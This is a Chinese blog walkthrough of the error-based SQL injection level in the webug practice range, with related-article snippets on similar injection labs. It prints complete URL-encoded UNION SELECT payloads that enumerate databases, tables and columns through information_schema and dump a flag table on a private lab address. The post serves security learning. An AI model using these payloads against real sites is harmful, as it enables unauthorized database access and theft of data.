webug——显错注入

最新推荐文章于 2023-07-11 15:31:40 发布
最新推荐文章于 2023-07-11 15:31:40 发布
阅读量295 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_25725865/article/details/100928503
版权

这里遇到一个小坑,首先需要切换php版本,不然不报错
在这里插入图片描述
插入单引号进行测试,发现报错,并且可以看到表名
在这里插入图片描述
接下来使用order by 查询列数,由于后面还存在一个’,可以采用注释将其跳出
(mysql有三种注释方法,1、# … 2、-- … 3、/…/,%23是#的url表示)
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
2列时正确
在这里插入图片描述
可以得到列数为2,再使用union查询,爆出显位,替换需要查询的数据
在这里插入图片描述
查询mysql版本
在这里插入图片描述
版本大于15的话mysql里面就有information_schema这个数据库,我们可以通过这个数据库获取到mysql里各个数据库及其表和字段的信息
查看当前数据库
在这里插入图片描述
查看所有数据库,用到group_concat函数
http://192.168.199.143/control/sqlinject/manifest_error.php?id=1%27%20union%20select%201,group_concat(schema_name)%20from%20information_schema.SCHEMATA%20%23
在这里插入图片描述
前面三个为系统自带数据库
目前不知道flag在哪个数据库中,优先考虑当前使用的数据库
http://192.168.199.143/control/sqlinject/manifest_error.php?id=1%27%20union%20select%201,group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%22webug%22%23
在这里插入图片描述
可以看到flag表,查看列名确认是不是我们想要的
http://192.168.199.143/control/sqlinject/manifest_error.php?id=1%27%20union%20select%201,group_concat(column_name)%20from%20information_schema.columns%20where%20table_name=%22flag%22%20and%20table_schema=%22webug%22%23
在这里插入图片描述
获取flag的值
http://192.168.199.143/control/sqlinject/manifest_error.php?id=1%27%20union%20select%20*%20from%20flag%20%23
在这里插入图片描述

安全我只会360
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
webug3.0渗透测试靶场
05-07
webug3.0渗透测试靶场!从官方虚拟机中提取出来的!代码优化,去除重复的文件!内附安装介绍及搭建工具!
SQL注入--显错注入
weixin_48803011的博客
12-14 688
显错注入就是通过sql注入再利用网页的显示位进行数据的读取
渗透测试基础-显错注入
weixin_45488495的博客
04-07 1154
渗透测试基础-显错注入显错注入是什么网站错误显示恶意语句的尝试进入靶场看看实际情况![在这里插入图片描述](https://img-blog.csdnimg.cn/2021040621394241.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80NTQ4ODQ5NQ==,size_16,color_FFFFFF,t_70)进一步尝
webug---注入
gclome的博客
06-04 595
5 过滤注入 6 宽字节注入 7 xxe注入 8 csv注入 这道题啥也看不到,也不能导出,有点鸡肋! 11 万能密码登陆 之所以会发生万能密码登陆,是因为: $sql = "SELECT * FROM user WHERE username = '{$username}' AND password = '{$password}'"; $res = $dbConnect->query($sql); 于是我们可以构造username的值,使得前面的判断为真,而且注释掉后面的内容 可以输入 ' or
Web安全】-【SQL注入】-显错注入
weixin_43960003的博客
02-14 2643
显错注入是sql注入的一种。是指web应用程序未对用户传入的数据做合法性校验,从而导致攻击者可以通过构造sql语句结合页面回显获取到想要的数据。
Webug靶场之旅——显错注入
weixin_53953503的博客
08-18 769
显错注入 显错注入是SQL注入的一种,而SQL注入是指web应用程序对用户输入数据的合法性没有判断,导致攻击者可以构造不同的sql语句来实现对数据库的操作。 SQL注入漏洞产生的条件:  1、用户能够控制数据的输入。  2、原本执行需要执行的代码时,拼接了用户的输入。 打开webug靶场,打开id为1的靶场后,如图: 这里我们使用工具的是Hackbar2.1.3版本,这个是免费的。 首先,我们需要判断是否存在SQL注入。在参数后面多加一个单引号,然后将它上传,发现报错了 通过页面的返回结果,
渗透学习 webug4.0靶场
07-12
渗透学习 webug4.0靶场 渗透学习 webug4.0靶场 渗透学习 webug4.0靶场
webug虚拟机平台.txt
09-20
webug虚拟机平台,可以自己在本地搭建自己的平台,看着源码学习安全,百度云的链接
webug4.0-master.zip
08-26
网上都是下载虚拟机运行虚拟机,这里是提取出的webug4.0源代码
漏洞靶站webug4.0
08-26
WeBug名称定义为“我们的漏洞”靶场环境 基础环境是基于PHP/mysql制作搭建而成,中级环境与高级环境分别都是由互联网漏洞事件而收集的漏洞存在的操作环境。 部分漏洞是基于Windows操作系统的漏洞所以将WeBugweb...
webug————显错注入
weixin_55554070的博客
01-10 2635
1、打开靶场,寻找注入点进行测试 id=1 2、输入’;";),进行判断查看是否报错 输入”;)页面无变化,’出现报错,说明存在SQL注入 3、注入流程 :寻找注入点—>构造注入语句查看数据库版本与信息—>获取敏感数据或getshell。 判断数据库版本(MySQL数据库版本在5.0以上有内置库 information_schema,存储着mysql的所有数据库和表结构信息);库——表——字段——数据 4、判断字段数 order by 5、3页面报错 2页面正常,说明.
webug--post注入
gclome的博客
06-03 1013
今天来到了post注入 首先我们要明确两个问题 什么是post注入 post注入是通过对输入框进行传参,可以被带入数据库进行的查询 什么条件下可以进行post注入 1.用户可以控制传参; 2.用户输入的语句被带入数据库进行查询。 ok,开始今天的练习题: 访问靶场: 这次页面和前几关不同,明显可见有输入框。 寻找注入点 在输入框尝试1234,英文都没有反应 这时候我们猜测是不是搜索到了结果但是不显示,这样的话就需要特殊字符来让页面产生变化,比如报错页面之类的 输入1’,报错了,找到了注入点 找到注入点后尝试
GET和POST的区别
weixin_30645617的博客
08-28 133
1.GET把参数包含在URL中,POST通过request body传递参数。 2.GET在浏览器回退时是无害的,而POST会再次提交请求。 3.GET产生的URL地址可以被Bookmark,而POST不可以。 4.GET请求会被浏览器主动cache,而POST不会,除非手动设置。 5.GET请求只能进行url编码,而POST支持多种编码方式。 6.GET...
显错注入(一)
qq_45300786的博客
06-24 2804
显错注入(一) 注入环境: http://inject2.lab.aqlab.cn:81/Pass-01/index.php?id=1 SQL注入原理解析以及举例1   sql注入是指web应用程序对用户输入数据的合法性没有判断, 导致攻击者可以构造不同的sql语句来实现对数据库的操作。   sql注入漏洞产生满足条件:     1;用户能够控制数据的输入。     2;原本需要执行的代码,拼接了用户的输入。  举例:   注意:下面测试环境使用封神台免费靶场。可以从下面链接进入:https://hack.
SQL注入--显错注入(zkaq)
最新发布
weixin_74410605的博客
07-11 752
sql注入是一种数据库攻击攻击手段,就是用户在表单填写sql语句来使数据库执行该语句,在管理员不知情的情况下任意查询数据库中的信息,从而获得自身需要的信息,所以sql注入攻击的本质就是将用户输入的数据当作代码执行。
SQL注入显错注入
秋水的博客
08-30 3688
MySQL基础知识 系统自带库information_schema中存在tables表和columns表,我们可以通过这两个表查询相关信息 distinct关键字,distinct用于去除查询中的重复,可以用information_schema.tables中的TABLE_SCHEMA字段查询出所有库信息 group_concat()函数,此函数只有MySQL中存在,作用是把查询出的内容通...
webug4.0—显错注入
Stephen Wolf
01-09 376
所用到一些知识: 1. concat(str1,str2,...) 返回结果为参数间无间隔符连接起来的字符串,如果其中有一个参数为NULL,返回结果为NULL 2. concat_ws(separator, str1, str2, ...) 含有分隔符地连接字符串,第一个参数为制定的分隔符 3. group_concat(str1,str2,...)  连接一个组的所有字符串,...
Webug4.0靶场通关笔记(第一天)--------显错注入和布尔注入
Yasso的博客
02-20 1052
一、显错注入 打开靶场试试尝试修改为id=2,回显hello。 1、首先判断注入点 插播一条,php版本必须为5.3.29,不然不会报错!!!!!!!!!!!!!!!! 尝试加单引号,会报错, (%23不能在hackbar上输入,否则会一直报错,我们来测试下在hackbar上输的%23到url上变成了%2523,很明显这是#的二次url编码)还是不用hackbar了,也可能是我的hackbar有问题。 ?id=1’ 页面报错 ?id=1’ or 1=1%23 页面显示正常 (这里#貌似被过
web漏洞-sql注入
CN_SHzhaoyujie的博客
12-04 350
文章目录SQL注入原理acccess+asp注入基本流程SQL注入发现注入分类注入提交方式注入方式SQL手工注入手工注入流程:实例操作过程:常见查看数据库信息的函数:sqlmap的使用常用参数针对POST方式的注入防护SQL注入 SQL注入原理 SQL:结构化查询语言,是一种特殊目的的编程语言,一种数据库查询和程序设计语言,用于存取数据以及查询、更新和管理关系数据库系统。 原理:通过构建特殊的输入...
webug笔记——注入
gbxiaowang的博客
06-01 397
一、布尔注入 id=1‘’or 1=1–+ 这里存在注入点 id=1%27order%20by%203–+ 利用order by判断字段 Order by 3的时候页面发生变化。 所以应该是有两个可以显示的地方。 利用left()函数判断数据库名,先判断数据库名长度 大于5的时候页面发生变化,说明数据库名长度应该是5. id=1’ and left(database(),1)>‘w’–+ 猜测出数据库名的第一个字符是w 前两个是we,这样逐步猜测出数据库名是webug. 查看当前数据库表 i
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值